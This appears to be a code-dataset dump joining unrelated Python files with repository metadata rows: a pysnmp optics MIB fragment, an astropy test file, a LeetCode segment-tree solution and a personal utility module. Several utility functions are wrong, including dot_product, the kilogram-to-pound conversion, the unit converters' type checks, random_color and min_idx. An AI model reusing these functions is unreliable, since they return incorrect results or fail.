if mibBuilder.loadTexts: chrComPmOpticsSuspectedIntrvl.setStatus('current')
chrComPmOpticsElapsedTime = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 3), Unsigned32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsElapsedTime.setStatus('current')
chrComPmOpticsSuppressedIntrvls = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 4), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsSuppressedIntrvls.setStatus('current')
chrComPmOpticsORS = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 5), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsORS.setStatus('current')
chrComPmOpticsSES = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 6), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsSES.setStatus('current')
chrComPmOpticsUAS = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 7), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsUAS.setStatus('current')
chrComPmOpticsMean = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsMean.setStatus('current')
chrComPmOpticsMax = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsMax.setStatus('current')
chrComPmOpticsMin = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsMin.setStatus('current')
chrComPmOpticsSD = MibTableColumn((1, 3, 6, 1, 4, 1, 3695, 1, 10, 1, 11, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: chrComPmOpticsSD.setStatus('current')
mibBuilder.exportSymbols("ChrComPmOpticsOMS-SRC-Interval-MIB", chrComPmOpticsSES=chrComPmOpticsSES, chrComPmOpticsSuspectedIntrvl=chrComPmOpticsSuspectedIntrvl, chrComPmOpticsMean=chrComPmOpticsMean, chrComPmOpticsMin=chrComPmOpticsMin, chrComPmOpticsORS=chrComPmOpticsORS, chrComPmOpticsOMS_SRC_IntervalEntry=chrComPmOpticsOMS_SRC_IntervalEntry, chrComPmOpticsSuppressedIntrvls=chrComPmOpticsSuppressedIntrvls, chrComPmOpticsUAS=chrComPmOpticsUAS, chrComPmOpticsElapsedTime=chrComPmOpticsElapsedTime, chrComPmOpticsMax=chrComPmOpticsMax, chrComPmOpticsOMS_SRC_IntervalTable=chrComPmOpticsOMS_SRC_IntervalTable, chrComPmOpticsIntervalNumber=chrComPmOpticsIntervalNumber, chrComPmOpticsSD=chrComPmOpticsSD)
| [
"dcwangmit01@gmail.com"
] | dcwangmit01@gmail.com |
ffda15de7089820556396da2ce8e685c3b9e6e91 | 62b75c03509dcd993a28eba2bb7004ae5f427f73 | /astropy/nddata/tests/test_flag_collection.py | 7ed4af6b0dcebb37473a2aebb7e4562660adce6a | [] | permissive | xiaomi1122/astropy | 08aba5592d9bb54e725708352e34db89af2ec289 | 8876e902f5efa02a3fc27d82fe15c16001d4df5e | refs/heads/master | 2020-04-09T12:27:36.768462 | 2018-12-06T01:11:23 | 2018-12-06T01:11:23 | 160,299,140 | 0 | 0 | BSD-3-Clause | 2018-12-04T04:52:22 | 2018-12-04T04:52:22 | null | UTF-8 | Python | false | false | 1,460 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from ...tests.helper import pytest
from .. import FlagCollection
def test_init():
FlagCollection(shape=(1, 2, 3))
def test_init_noshape():
with pytest.raises(Exception) as exc:
FlagCollection()
assert exc.value.args[0] == 'FlagCollection should be initialized with the shape of the data'
def test_init_notiterable():
with pytest.raises(Exception) as exc:
FlagCollection(shape=1.)
assert exc.value.args[0] == 'FlagCollection shape should be an iterable object'
def test_setitem():
f = FlagCollection(shape=(1, 2, 3))
f['a'] = np.ones((1, 2, 3)).astype(float)
f['b'] = np.ones((1, 2, 3)).astype(int)
f['c'] = np.ones((1, 2, 3)).astype(bool)
f['d'] = np.ones((1, 2, 3)).astype(str)
@pytest.mark.parametrize(('value'), [1, 1., 'spam', [1, 2, 3], (1., 2., 3.)])
def test_setitem_invalid_type(value):
f = FlagCollection(shape=(1, 2, 3))
with pytest.raises(Exception) as exc:
f['a'] = value
assert exc.value.args[0] == 'flags should be given as a Numpy array'
def test_setitem_invalid_shape():
f = FlagCollection(shape=(1, 2, 3))
with pytest.raises(Exception) as exc:
f['a'] = np.ones((3, 2, 1))
assert exc.value.args[0] == 'flags array shape (3, 2, 1) does not match data shape (1, 2, 3)'
| [
"thomas.robitaille@gmail.com"
] | thomas.robitaille@gmail.com |
72a5ea65e3d05e179ebf71c80191e2fe5820c5fa | bda892fd07e3879df21dcd1775c86269587e7e07 | /leetcode/0307_M_区域和检索 - 数组可修改_线段树.py | 612a279505a8bc32f9fedd8413e5da5368b70c77 | [] | no_license | CrzRabbit/Python | 46923109b6e516820dd90f880f6603f1cc71ba11 | 055ace9f0ca4fb09326da77ae39e33173b3bde15 | refs/heads/master | 2021-12-23T15:44:46.539503 | 2021-09-23T09:32:42 | 2021-09-23T09:32:42 | 119,370,525 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,030 | py | '''
给你一个数组 nums ,请你完成两类查询,其中一类查询要求更新数组下标对应的值,另一类查询要求返回数组中某个范围内元素的总和。
实现 NumArray 类:
NumArray(int[] nums) 用整数数组 nums 初始化对象
void update(int index, int val) 将 nums[index] 的值更新为 val
int sumRange(int left, int right) 返回子数组 nums[left, right] 的总和(即,nums[left] + nums[left + 1], ..., nums[right])
示例:
输入:
["NumArray", "sumRange", "update", "sumRange"]
[[[1, 3, 5]], [0, 2], [1, 2], [0, 2]]
输出:
[null, 9, null, 8]
解释:
NumArray numArray = new NumArray([1, 3, 5]);
numArray.sumRange(0, 2); // 返回 9 ,sum([1,3,5]) = 9
numArray.update(1, 2); // nums = [1,2,5]
numArray.sumRange(0, 2); // 返回 8 ,sum([1,2,5]) = 8
提示:
1 <= nums.length <= 3 * 104
-100 <= nums[i] <= 100
0 <= index < nums.length
-100 <= val <= 100
0 <= left <= right < nums.length
最多调用 3 * 104 次 update 和 sumRange 方法
'''
from typing import List
from leetcode.tools.tree import showTree, buildTree
class NumArray:
'''
线段树
'''
def __init__(self, nums: List[int]):
self.len = len(nums)
'''
长度为2n
'''
self.tree = [0 for _ in range(2 * self.len)]
'''
叶子节点即原数据放在[n, 2n - 1]
'''
self.tree[self.len:] = nums
'''
非叶子节点i左孩子为2 * i, 右孩子为2 * i + 1
'''
for i in range(self.len - 1, 0, -1):
self.tree[i] = self.tree[i * 2] + self.tree[i * 2 + 1]
'''
从n + index的叶节点开始更新
'''
def update(self, index: int, val: int) -> None:
index = index + self.len
self.tree[index] = val
while index > 0:
left = index
right = index
if left % 2 == 0:
right += 1
else:
left -= 1
index = left // 2
self.tree[index] = self.tree[left] + self.tree[right]
'''
[left, right]区间计算
'''
def sumRange(self, left: int, right: int) -> int:
left += self.len
right += self.len
sum = 0
while left <= right:
'''
left为右孩子,计算后右移
'''
if left % 2 == 1:
sum += self.tree[left]
left += 1
'''
right为左孩子,计算后左移
'''
if right % 2 == 0:
sum += self.tree[right]
right -= 1
left //= 2
right //= 2
return sum
numArray = NumArray([1, 3, 5])
print(numArray.sumRange(0, 2), numArray.update(1, 2), numArray.sumRange(0, 2))
showTree(buildTree([i for i in range(1, 10)]))
'''
1
2 3
4 5 6 7
8 9 . . . . . .
'''
| [
"1016864609@qq.com"
] | 1016864609@qq.com |
6f28896faeb0e9fe47f882df32f74ded478ad885 | 7ae0f100b49763f79b276260bbc0e87bd904da3e | /src/app/__init__.py | 5b98b0a760bd15666f075779f5753aab40f11762 | [] | no_license | wondersell/wildsearch-indexer | d88a5b3bce17acc1cb61d365f55ab5d9f63f61ae | 67d5f29f6d405c055cfa211ddf0b70521382a671 | refs/heads/master | 2023-07-19T00:33:34.371231 | 2020-12-31T11:20:00 | 2020-12-31T11:20:00 | 285,488,583 | 2 | 0 | null | 2021-07-19T06:26:44 | 2020-08-06T06:09:51 | Python | UTF-8 | Python | false | false | 174 | py | # This will make sure the app is always imported when
# Django starts so that shared_task will use this app.
from .celery import celery # noqa: ABS101
__all__ = ['celery']
| [
"artem.kiselev@gmail.com"
] | artem.kiselev@gmail.com |
adc0635f574f63d92b902ca2d499b1a9ad040a7f | 679ce4b323f79b2425976201324c6c1f88b95199 | /Python/Income Visualizer/utility.py | 3f033f36de6b4d08bcf30b93fbaa67394dc0c784 | [] | no_license | abriggs914/Coding_Practice | ff690fb5f145a11f4da144f3882b37f473b10450 | 3afd7c59e0d90f0ef5f6203853e69f853312019b | refs/heads/master | 2023-08-31T04:04:58.048554 | 2023-08-29T13:23:29 | 2023-08-29T13:23:29 | 161,865,421 | 0 | 1 | null | 2022-10-27T08:35:29 | 2018-12-15T03:20:14 | Python | UTF-8 | Python | false | false | 51,770 | py | from locale import currency, setlocale, LC_ALL
from math import e, ceil, sin, cos, radians
from random import random, choice
import datetime as dt
import shutil
import sys
import os
"""
General Utility Functions
Version..............1.28
Date...........2021-10-07
Author.......Avery Briggs
"""
def func_def():
pass
class Foo:
def __init__(self):
pass
def f1(self):
pass
def f2(self, f):
pass
FOO_OBJ = Foo()
def isfunc(f):
return isinstance(f, type(func_def))
def isclassmethod(m):
return isinstance(m, type(FOO_OBJ.f1))
def lenstr(x):
return len(str(x))
def minmax(a, b):
if a <= b:
return a, b
return b, a
def avg(lst):
try:
return sum(lst) / max(1, len(lst))
except TypeError:
return 0
def median(lst):
if not isinstance(lst, list) and not isinstance(lst, str):
raise TypeError("Cannot find median of \"{}\" of type: \"{}\".".format(lst, type(lst)))
if not lst:
return None
lt = lst.copy()
lt.sort()
l = len(lt)
if l == 1:
return lt
else:
h = l // 2
o = (l % 2) == 1
f = [] if o else lt[h - 1: h]
return f + lt[h: h + 1]
def mode(lst):
if not isinstance(lst, list) and not isinstance(lst, str):
raise TypeError("Cannot find mode of \"{}\" of type: \"{}\".".format(lst, type(lst)))
d = {}
mv = float("-inf")
for el in lst:
if el in d:
v = d[el] + 1
else:
v = 1
d[el] = v
if v > mv:
mv = v
print("mv", mv, "d", d)
return [k for k, v in d.items() if v == mv]
def pad_centre(text, l, pad_str=" "):
if l > 0:
h = (l - len(text)) // 2
odd = (((2 * h) + len(text)) == l)
text = text.rjust(h + len(text), pad_str)
h += 1 if not odd else 0
text = text.ljust(h + len(text), pad_str)
return text
else:
return ""
def text_size(txt):
spl = txt.split("\n")
return len(spl), max([len(line) for line in spl])
# Function returns a formatted string containing the contents of a dict object.
# Special lines and line count for values that are lists.
# Supports dictionaries with special value types.
# Lists are printed line by line, but the counting index is constant for all elements. - Useful for ties.
# Dicts are represented by a table which will dynamically generate a header and appropriately format cell values.
# Strings, floats, ints, bools are simply converted to their string representations.
# d - dict object.
# n - Name of the dict, printed above the contents.
# number - Decide whether to number the content lines.
# l - Minimum number of chars in the content line.
# Spaces between keys and values are populated by marker.
# sep - Additional separation between keys and values.
# marker - Char that separates the key and value of a content line.
# sort_header - Will alphabetically sort the header line if any value is a
# dictionary. Only one level of nesting supported.
# min_encapsulation - If a table is necessary because of a value that is a
# dictionary, then opt to keep all column widths as small as
# possible. This will most likely produce varying widths.
# table_title - If a table is created, then display the title in the first
# column directly above the row names.
def dict_print(d, n="Untitled", number=False, l=15, sep=5, marker=".", sort_header=False, min_encapsulation=True,
table_title="", TAB=" ", SEPARATOR=" - ", TABLE_DIVIDER="|"):
if not d or not n or type(d) != dict:
return "None"
m = "\n{}-- ".format(TAB[:len(TAB) // 2]) + str(n).title() + " --\n\n"
fill = 0
# max_key = max([len(str(k)) + ((2 * len(k) + 2 + len(k) - 1) if type(k) == (list or tuple) else 0) for k in d.keys()])
# max_val = max([max([len(str(v_elem)) for v_elem in v]) if type(v) == (list or tuple) else len(str(v)) if type(v) != dict else 0 for v in d.values()])
# fill += sum([len(v) for v in d.values() if type(v) == (list or tuple)])
# l = max(l, (max_key + max_val)) + sep
# has_dict = [(k, v) for k, v in d.items() if type(v) == dict]
# has_list = any([1 if type(v) in [list, tuple] else 0 for v in d.values()])
max_key = float("-inf")
max_val = float("-inf")
fill = float("-inf")
l = float("-inf")
has_dict = False
has_list = False
for k, v in d.items():
max_key = max((len(str(k)) + ((2 * len(k) + 2 + len(k) - 1) if type(k) == (list or tuple) else 0)), max_key)
max_val = max((max([len(str(v_elem)) for v_elem in v] if v else [0]) if (
(type(v) == list) or (type(v) == tuple)) else len(
str(v)) if type(v) != dict else 0), max_val)
l = max(len(table_title), max(l, (max_key + max_val))) + sep
has_dict = [(k, v) for k, v in d.items() if type(v) == dict or (type(v) == list and v and type(v[0]) == dict)]
has_list = any([1 if type(v) in [list, tuple] else 0 for v in d.values()])
header = []
max_cell = 0
max_cell_widths = []
# print("has_dict: {hd}".format(hd=has_dict))
if has_list:
number = True
for k1, v in has_dict:
for k2 in v:
key = str(k2)
# print("key: {k}".format(k=key))
if key not in header:
if type(v) == dict:
# print("\t\tNew key: {k}".format(k=key))
header.append(key)
max_cell = max(max_cell, max(len(key), max([lenstr(value) for value in v.values()])))
# print("max_cell: {mc}".format(mc=max_cell))
elif type(k2) == dict:
strkeys = list(map(str, list(k2.keys())))
strvals = list(map(str, list(k2.values())))
header += [strkey for strkey in strkeys if strkey not in header]
max_cell = max(max_cell, max(list(map(len, strkeys))), max(list(map(len, strvals))))
else:
for lst in v:
a = max(list(map(lenstr, list(map(str, lst.keys())))))
b = max(list(map(lenstr, list(map(str, lst.values())))))
# print("a: {a}, b: {b}, values: {v}".format(a=a, b=b, v=lst.values()))
max_cell = max(max_cell, max(a, b))
max_cell += 2
# print("max_cell: {mc}".format(mc=max_cell))
if sort_header:
header.sort(key=lambda x: x.rjust(max_cell))
if min_encapsulation:
for h in header:
max_col_width = len(h) + 2
# print("h: {h}, type(h): {th}".format(h=h, th=type(h)))
for k, d_val in has_dict:
d_val = {str(d_val_k): str(d_val_v) for d_val_k, d_val_v in d_val.items()} if type(
d_val) == dict else d_val
# print("d_val: {dv},\thidv: {hidv},\tetdvlist: {etdvl}".format(dv=d_val, hidv=(h in d_val), etdvl=(type(d_val) == list)))
# print("k: {k}\nt(k): {tk}\nd: {d}\nt(d): {td}".format(k=k, tk=type(k), d=d_val, td=type(d_val)))
if h in d_val:
max_col_width = max(max_col_width, lenstr(d_val[h]) + 2)
elif type(d_val) == list:
max_col_width = max(max_col_width, max([max(
max(list(map(lenstr, [ek for ek in elem.keys() if ek == h]))),
max(list(map(lenstr, [ev for ek, ev in elem.items() if ek == h]))) + 2) for elem in d_val]))
max_cell_widths.append(max_col_width)
# print("max_cell_widths: {mcw}".format(mcw=max_cell_widths))
table_header = TABLE_DIVIDER + TABLE_DIVIDER.join(
map(lambda x: pad_centre(str(x), max_cell), header)) + TABLE_DIVIDER
empty_line = TABLE_DIVIDER + TABLE_DIVIDER.join(
[pad_centre(" ", max_cell) for i in range(len(header))]) + TABLE_DIVIDER
if min_encapsulation:
table_header = TABLE_DIVIDER + TABLE_DIVIDER.join(
[pad_centre(str(h), max_cell_widths[i]) for i, h in enumerate(header)]) + TABLE_DIVIDER
empty_line = TABLE_DIVIDER + TABLE_DIVIDER.join(
[pad_centre(" ", max_cell_widths[i]) for i in range(len(header))]) + TABLE_DIVIDER
else:
max_cell_widths = [max_cell for i in range(len(header))]
# print("Header: {h}\nTable Header: {th}".format(h=header, th=table_header))
fill = "".join([" " for i in range(len(str(fill + len(d))))])
table_width = l + len(fill) + len(SEPARATOR) + len(TAB) + len(table_header) - (4 * len(TABLE_DIVIDER))
table_tab = "".join([marker for i in range(len(TAB))])
if has_dict:
table_header_title = pad_centre(table_title, l + len(SEPARATOR) - 1)
m += TAB
m += "" if not number else fill + SEPARATOR
m += table_header_title + table_header.rjust(
table_width - len(table_header_title) - len(fill) - len(SEPARATOR)) + "\n"
i = 0
# print("FINAL L: {l}\nFill: {n}<{f}>".format(l=l, n=len(fill), f=fill))
for k, v in d.items():
if type(v) not in [list, tuple]:
v = [v]
for j, v_elem in enumerate(v):
ml = str(k).strip()
orig_ml = ml
num = str(i + 1)
if number:
ml = fill + SEPARATOR + ml
if j == 0:
ml = num.ljust(len(fill)) + ml[len(fill):]
v_val = v_elem
if has_dict and type(v_elem) == dict:
v_val = ""
ml += str(v_val).rjust(l - len(orig_ml), marker)
if has_dict:
ml += table_tab
if type(v_elem) == dict:
keys = {str(k).strip(): v for k, v in v_elem.items()}
vals = [keys[key] if key in keys else "" for key in header]
ml += TABLE_DIVIDER + TABLE_DIVIDER.join(
pad_centre(str(cell), max_cell_widths[i]) for i, cell in enumerate(vals)) + TABLE_DIVIDER
else:
ml += empty_line
ml += "\n"
m += TAB + ml
i += 1
return m
def money(v, int_only=False):
# return "$ %.2f" % v
setlocale(LC_ALL, "")
m = currency(v, grouping=True)
i = m.index("$") + 1
if int_only:
return (m[:i] + " " + m[i:]).split(".")[0]
return m[:i] + " " + m[i:]
def money_value(m):
return float("".join(m[1:].split(",")))
def percent(v):
return ("%.2f" % (v * 100)) + " %"
def compute_min_edit_distance(a, b, show=False):
len_a = len(a)
len_b = len(b)
x = max(len_a, len_b)
s = b if x == len_a else a
m, instructions = min_edit_distance(a, b, show_table=show)
# print(instructions)
return m
def min_edit_distance(a, b, show_table=False):
a = a.upper()
b = b.upper()
n = len(a) + 2
m = len(b) + 2
table = [[0 for j in range(n)] for i in range(m)]
for i in range(2, max(n, m)):
if i < n:
table[0][i] = a[i - 2]
table[1][i] = i - 1
if i < m:
table[i][0] = b[i - 2]
table[i][1] = i - 1
for i in range(2, m):
for j in range(2, n):
x = table[i][j - 1]
y = table[i - 1][j - 1]
z = table[i - 1][j]
mini = min(x, min(y, z))
u = table[0][j]
v = table[i][0]
if u == v:
table[i][j] = table[i - 1][j - 1]
else:
# System.out.println("x: " + x + ", y: " + y + ", z: " + z + ", min(x, min(y, z): " + mini);
table[i][j] = mini + 1
if show_table:
show(table)
print("Minimum edit Distance to convert \"" + a + "\" to \"" + b + "\": " + str(table[m - 1][n - 1]))
return table[m - 1][n - 1], table
def show(arr):
res = "{"
for i in range(len(arr)):
res += "{"
if i > 0:
res += " "
for j in range(len(arr[i])):
if j < len(arr[i]) - 1:
if i == 0 or j == 0:
res += str(arr[i][j]) + ", "
else:
res += str(arr[i][j]) + ", "
else:
if i == 0 or j == 0:
res += str(arr[i][j])
else:
res += str(arr[i][j])
if i < len(arr) - 1:
res += "},\n"
else:
res += "}"
res += "}\n"
print(res)
def add_business_days(d, bd, holidays=None):
if holidays == None:
holidays = []
i = 0
t = dt.datetime(d.year, d.month, d.day)
# print("holidays: " + str(holidays))
while i < bd:
t = t + dt.timedelta(days=1)
# print("t: " + str(t) + ", (t not in holidays): " + str(t not in holidays))
if t.weekday() < 5 and t not in holidays:
i += 1
return t
def business_days_between(d1, d2, holidays=None):
business_days = 0
if holidays == None:
holidays = []
date_1 = d1 if type(d1) == dt.datetime else dt.datetime.strptime(d1, "%d-%b-%y")
date_2 = d2 if type(d2) == dt.datetime else dt.datetime.strptime(d2, "%d-%b-%y")
date_1, date_2 = minmax(date_1, date_2)
diff = (date_2 - date_1).days
temp = date_1
for i in range(diff):
temp = date_1 + dt.timedelta(days=i + 1)
if temp.weekday() < 5 and temp not in holidays: # Monday == 0, Sunday == 6
business_days += 1
i = 0
while temp.weekday() >= 5 or temp in holidays:
temp = temp + dt.timedelta(days=1)
if temp not in holidays:
business_days += 1
break
# print("temp: {temp}\ndate_2: {date_2}\ntemp < date_2: {td2}".format(temp=temp, date_2=date_2, td2=(temp < date_2)))
# print("business_days: " + str(business_days))
return business_days
def intersection(a, b):
res = []
l = a if len(a) >= len(b) else b
m = b if len(a) >= len(b) else a
for i in l:
if i in m:
res.append(i)
return res
def disjoint(a, b):
overlap = intersection(a, b)
res = []
for el in a + b:
if el not in overlap:
res.append(el)
return res
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
def isnumber(value):
if isinstance(value, int) or isinstance(value, float):
return True
if isinstance(value, str):
if value.count("-") < 2:
if value.replace("-", "").isnumeric():
return True
return False
def same_calendar_day(d1, d2):
if type(d1) != type(d2) and type(d1) != dt.datetime:
raise ValueError(
"Check types of d1: <{d1}> and d2: <{d2}>.\nBoth values must be datetime.datetime objects.".format(d1=d1,
d2=d2))
return all([
d1.year == d2.year,
d1.month == d2.month,
d1.day == d2.day
])
def pyth(a=None, b=None, c=None):
if all([a is None, b is None, c is None]):
return None
if c is None:
if a is not None and b is not None:
return {"a": a, "b": b, "c": (a ** 2 + b ** 2) ** 0.5}
elif a is None:
if b is not None and c is not None:
return {"a": (c ** 2 - b ** 2) ** 0.5, "b": b, "c": c}
elif b is None:
if a is not None and c is not None:
return {"a": a, "b": (c ** 2 - a ** 2) ** 0.5, "c": c}
return {"a": a, "b": b, "c": c}
def sigmoid(x):
return 1 / (1 + (e ** -x))
def random_in_range(a, b):
return ((max(a, b) - min(a, b)) * random()) + min(a, b)
def max_idx(lst):
max_val = None, float("-inf")
for i, el in enumerate(lst):
if el > max_val[1]:
max_val = i, el
return max_val
def min_idx(lst):
min_val = None, float("inf")
for i, el in enumerate(lst):
if el < min_val:
min_val = i, el
return min_val
# Usage:
# (val, weight) where weight is a float or integer.
# float weights must sum to 1 or less, indicatiing a percentage of 100.
# A whole integer will be considered as a ratio value.
# l1 = [(1, 0.7), (2, 0.3)] # '1' 70% of the time, '2' 30% of the time
# l2 = [(0, 0.05), (1, 0.05), (2, 0.05), (3, 0.1), (4, 0.2), (5, 0.05), (6, 10), (7, 2), (8, 3)]
# 5% of the time: '0', '1', '2', '5', '3' 10% of the time, '4' 20% of the time, and 10 individual counts of 6, 2 and 7 and 3 counts of 8.
# l3 = [("Avery", 5), ("Jordan", 15), ("Briggs", 2)]
# List of 5 counts of 'Avery', 15 counts of 'Jordan', and 2 counts of 'Briggs'
# weighted_choice(l1)
# Returns a radnom choice from a generated weighted list.
def weighted_choice(weighted_lst):
item_scalar = 10
lst_len = 1000
res = []
whole = []
fract = []
fract_sum = 0
sum_count = 0
for el in weighted_lst:
if isinstance(el, list) or isinstance(el, tuple):
if len(el) == 2:
val, weight = el
if str(weight).startswith("0."):
fract.append(el)
fract_sum += weight
sum_count += weight * lst_len
else:
whole.append(el)
# print("Whole:", whole)
# print("Fract:", fract)
if fract_sum > 1:
print("Fract:", fract)
raise ValueError("Fractional weights sum to 1 or less.")
remaining = lst_len - sum_count
remaining = remaining if remaining != 0 else 1
sum_whole = sum([weight for val, weight in whole])
sum_whole = sum_whole if sum_whole != 0 else 1
p = sum_whole / remaining
for val, weight in fract:
# print("item_scalar:", item_scalar, "p:", p, "weight:", weight, "lst_len:", lst_len)
s = ceil(item_scalar * p * weight * lst_len)
# print("\ts:", s)
res += [val for i in range(s)]
for val, weight in whole:
# print("{} x {}".format(weight, val))
res += [val for i in range(ceil(weight))]
# print("\tres", res)
if res:
# print("Choice from:\n\t{}".format(res))
return choice(res)
if isinstance(weighted_lst, list) or isinstance(weighted_lst, tuple):
# print("Choice from:\n\t{}".format(weighted_lst))
return choice(weighted_lst)
return None
# TODO - Broken test:
# weighted_choice([(1, 9), 2])
def lbs_kg(lbs):
"""
lbs_kg(args) -> int() or float()
Convert N pounds to Kilograms.
1 Lbs = 0.453592 Kg
:param lbs: int or float value in pounds.
:return: float value in kilograms.
"""
if not isinstance(lbs, int) or isinstance(lbs, float):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to kilograms.".format(lbs, type(lbs)))
return 0.453592 * lbs
def kg_lbs(kg):
"""
kg_lbs(args) -> int() or float()
Convert N Kilograms to pounds.
1 Lbs = 0.453592 Kg
:param kg: int or float value in kilograms.
:return: float value in pounds.
"""
if not isinstance(kg, int) or isinstance(kg, float):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to pounds.".format(kg, type(kg)))
if kg == 0:
return 0.0
return 1 / lbs_kg(kg)
def miles_km(miles):
"""
miles_km(args) -> int() or float()
Convert N Miles to Kilometers.
1 Mi = 1.60934 Km
:param miles: int or float value in miles.
:return: float value in kilometers.
"""
if not isinstance(miles, int) or isinstance(miles, float):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to miles.".format(miles, type(miles)))
return 1.60934 * miles
def km_miles(km):
"""
km_miles(args) -> int() or float()
Convert N Kilometers to Miles.
1 Mi = 1.60934 Km.
:param km: int or float value in kilometers.
:return: float value in miles.
"""
if not isinstance(km, int) or isinstance(km, float):
raise ValueError("Cannot convert \"{}\" of type: \"{}\" to kilometers.".format(km, type(km)))
if km == 0:
return 0.0
return 1 / miles_km(km)
def flatten(lst):
"""
flatten(args) -> list()
Flatten a multi-dimensional list into a single dimension.
Non-list objects are returned in a list.
:param lst: list object with one or more dimensions.
:return: list object with one dimension.
"""
if not isinstance(lst, list):
return [lst]
if not lst:
return lst
return [*flatten(lst[0]), *flatten(lst[1:])]
# Clamp an number between small and large values.
# Inclusive start, exclusive end.
def clamp(s, v, l):
return max(s, min(v, l))
# Darken an RGB color using a proportion p (0-1)
def darken(c, p):
r, g, b = c
r = clamp(0, round(r - (255 * p)), 255)
g = clamp(0, round(g - (255 * p)), 255)
b = clamp(0, round(b - (255 * p)), 255)
return r, g, b
# Brighten an RGB color using a proportion p (0-1)
def brighten(c, p):
r, g, b = c
r = clamp(0, round(r + (255 * p)), 255)
g = clamp(0, round(g + (255 * p)), 255)
b = clamp(0, round(b + (255 * p)), 255)
return r, g, b
# return random RGB color
def random_color():
return (
random.randint(10, 245),
random.randint(10, 245),
random.randint(10, 245)
)
# Rotate a 2D point about the origin, a given amount of degrees. Counterclockwise
def rotate_on_origin(px, py, theta):
t = radians(theta)
x = (px * cos(t)) - (py * sin(t))
y = (px * sin(t)) + (py * cos(t))
return x, y
# Rotate a 2D point around any central point, a given amount of degrees. Counterclockwise
def rotate_point(cx, cy, px, py, theta):
xd = 0 - cx
yd = 0 - cy
rx, ry = rotate_on_origin(px + xd, py + yd, theta)
return rx - xd, ry - yd
def bar(a, b, c=10):
if not isinstance(c, int) or c < 1:
c = 10
return "{} |".format(percent(a / b)) + "".join(["#" if i < int((c * a) / b) else " " for i in range(c)]) + "|"
def lstindex(lst, target):
for i, val in enumerate(lst):
if val == target:
return i
return -1
def cos_x(degrees, amplitude=1, period=1, phase_shift=0, vertical_shift=0):
return (amplitude * (cos(period * (degrees + phase_shift)))) + vertical_shift
def sin_x(degrees, amplitude=1, period=1, phase_shift=0, vertical_shift=0):
return (amplitude * (sin(period * (degrees + phase_shift)))) + vertical_shift
def get_terminal_columns():
return shutil.get_terminal_size().columns
def is_imported(module_name):
return module_name in sys.modules
def distance(start, end):
return ((start[0] - end[0]) ** 2 + (start[1] - end[1]) ** 2) ** 0.5
def dot_product(a, b):
return (a[0] * b[0]) + (b[0] * b[1])
def reduce(lst, p, how="left"):
if not isinstance(how, str):
how = str(how)
how = how.lower()
if how not in ["left", "center", "right", "distributed"]:
how = "distributed"
l = len(lst)
n_items = round(l * p)
if n_items <= 0:
return []
if how == "left":
return lst[:n_items]
elif how == "center":
a = (l - n_items) // 2
b = (l + n_items) // 2
if l % 2 == 1:
b += 1
return lst[a:b]
elif how == "right":
return lst[l - n_items:]
else:
return lst[0: l: l // n_items]
class Line:
def __init__(self, x1, y1, x2, y2):
self.x1 = x1
self.y1 = y1
self.x2 = x2
self.y2 = y2
self.is_init = False
self.tupl = None
self.p1 = None
self.p2 = None
self.m = None
self.b = None
self.abc = None
self.init(x1, y1, x2, y2)
def init(self, x1, y1, x2, y2):
self.tupl = ((x1, y1), (x2, y2))
self.p1 = x1, y1
self.p2 = x2, y2
div = x2 - x1
if div != 0:
self.m = (y2 - y1) / div
else:
self.m = "undefined"
if self.m != "undefined":
self.b = y1 - (x1 * self.m)
else:
self.b = "undefined"
self.abc = (y2 - y1, x1 - x2, ((y2 - y1) * x1) + ((x1 - x2) * y1))
self.is_init = True
def collide_point(self, x, y, is_segment=True):
if self.m == "undefined" or self.b == "undefined":
return self.x1 == x and self.x2 == x
if not is_segment:
return y == (self.m * x) + self.b
return y == (self.m * x) + self.b and (self.x1 <= x <= self.x2 or self.x2 <= x <= self.x1) and (
self.y1 <= y <= self.y2 or self.y2 <= y <= self.y1)
def collide_line(self, line):
assert isinstance(line, Line)
a1, b1, c1 = self.abc
a2, b2, c2 = line.abc
det = a1 * b2 - a2 * b1
if det == 0:
# Lines are parallel
return None
else:
x = (b2 * c1 - b1 * c2) / det
y = (a1 * c2 - a2 * c1) / det
if self.collide_point(x, y) and line.collide_point(x,
y) and self.x1 <= x <= self.x2 and self.y1 <= y <= self.y2 and line.x1 <= x <= line.x2 and line.y1 <= y <= line.y2:
return x, y
else:
return None
